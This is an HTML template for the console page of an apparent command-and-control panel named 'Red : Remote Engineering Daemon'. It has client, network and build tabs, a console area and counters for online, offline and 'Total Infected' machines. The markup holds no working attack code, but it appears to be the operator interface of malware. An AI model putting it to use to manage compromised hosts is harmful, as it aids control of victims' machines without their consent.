<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Red : Remote Engineering Daemon</title>
    <link rel="stylesheet" href="../static/style.css">
    <link rel="stylesheet" href="../static/home/console.css">
    <link rel="stylesheet" href="../static/home/card.css">
    <script type="text/javascript" src="../static/navigation.js"></script>

    <link rel="icon" href="../static/RED.ico" />
    
    <script src='https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.3.0/socket.io.js'></script>;
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script type="text/javascript" src="../static/home/console.js"></script>

</head>
    <body>
        <div id="panel">
            <img id="logo" src="../static/icons/RED.png">
        </div>
        <div id="topBar">
            <h3 id="menu" class="menu">Console</h3>
        </div>
        
        <div id="navBar">
            <button id="butconsole" class="navButton">
                <img width="50%" style="margin-top:5px;opacity:10%;" src="../static/icons/home.png">
            </button>
            
            <button id="butclient" class="navButton">
                <img width="50%" style="margin-top:5px;" src="../static/icons/clients.png">
            </button>

            <button id="butnetwork" class="navButton">
                <img width="50%" style="margin-top:5px;" src="../static/icons/network.png">
            </button>

            <button id="butbuild" class="navButton">
                <img width="50%" style="margin-top:5px;" src="../static/icons/build.png">
            </button>
        </div>

        <div class='console'>
            <div class='console-inner'>
                <div id="outputs">

                </div>
                
                <div class='output-cmd'>
                    
                </div>
            </div>
        </div>

        <div class="cards-list">
  
            <div id="card-orange" class="card">
                <div class="card_image"> 
                    <img src="../static/icons/online.png" /> 
                </div>
                <div class="card_title">
                    <p>Online : <h7 id="numOnline">X</h7></p>
                </div>
            </div>

            <div id="card-blue" class="card">
                <div class="card_image"> 
                    <img src="../static/icons/infected.png" /> 
                </div>
                <div class="card_title">
                    <p>Total Infected : <h7 id="numInfected">X</h7></p>
                </div>
            </div>

            <div id="card-purple" class="card">
                <div class="card_image"> 
                    <img src="../static/icons/offline.png" /> 
                </div>
                <div class="card_title">
                    <p>Offline : <h7 id="numOffline">X</h7></p>
                </div>
            </div>
          
          
          
          </div>

    </body>
</html>